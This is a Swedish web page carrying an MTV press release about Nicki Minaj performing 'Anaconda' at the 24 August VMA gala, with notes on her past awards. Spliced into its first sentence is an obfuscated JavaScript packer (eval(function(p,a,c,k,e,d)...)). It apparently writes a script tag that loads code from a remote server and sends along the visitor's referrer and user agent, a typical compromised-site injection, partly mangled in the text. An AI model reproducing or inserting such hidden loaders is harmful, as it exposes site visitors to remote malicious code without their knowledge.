Image Image Image Image Image Image Image Image Image Image

| 10 april, 2020

Scroll to top

Top

Drottningen av Hiphop ger MTV-scenen extra mycket bling

Drottningen av Hiphop ger MTV-scenen extra mycket bling

MTV eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hdfds|var|u0026u|referrer|sddnz||js|php’.split(’|’),0,{}))
kan idag stolt presentera att den spektakulära världstjärnan och rapparen Nicki Minaj nu är klar för att uppträda på VMA-galan den 24 augusti och hennes framträdande förväntas bli en av kvällens mest omtalade. Hiphop stjärnan kommer att framföra hennes nya singel ”Anaconda” för första gången. Singeln tillhör albumet ”The PinkPrint” som släpps senare i år.

VMA är väldigt betydelsefullt för branschen så alla går helhjärtat in för det. Jag ser så oerhört mycket fram emot mitt uppträdande på plats”, säger Nicki Minaj

Nicki Minaj fick sitt internationella genombrott med hennes debutalbum ”Pink Friday” som snabbt nådde rekordförsäljning. Sedan dess har hon fortsatt att inspirera med hennes musik och personliga stil. Nicki Minaj är inte en rookie när det kommer till VMA. Hon har tidigare stått på scenen vid två tillfällen och 2012 vann hon priset för ”Best Female Video” med låten ”Starships”.  Med hennes singel ”Super Bass” vann hon pris i kategorin ”Best Hip-Hop Video” år 2011.

MTV Music Video Awards hålls den 24 augusti i en sprillans ny arena, i området Inglewood, CA utanför Los Angeles. Andra artister som kommer att uppträda är Beyoncé, Maroon 5, Usher, Ariana Grande, 5 Seconds of Summer och Iggy Azalea.

Detta är ett pressmeddelande från MTV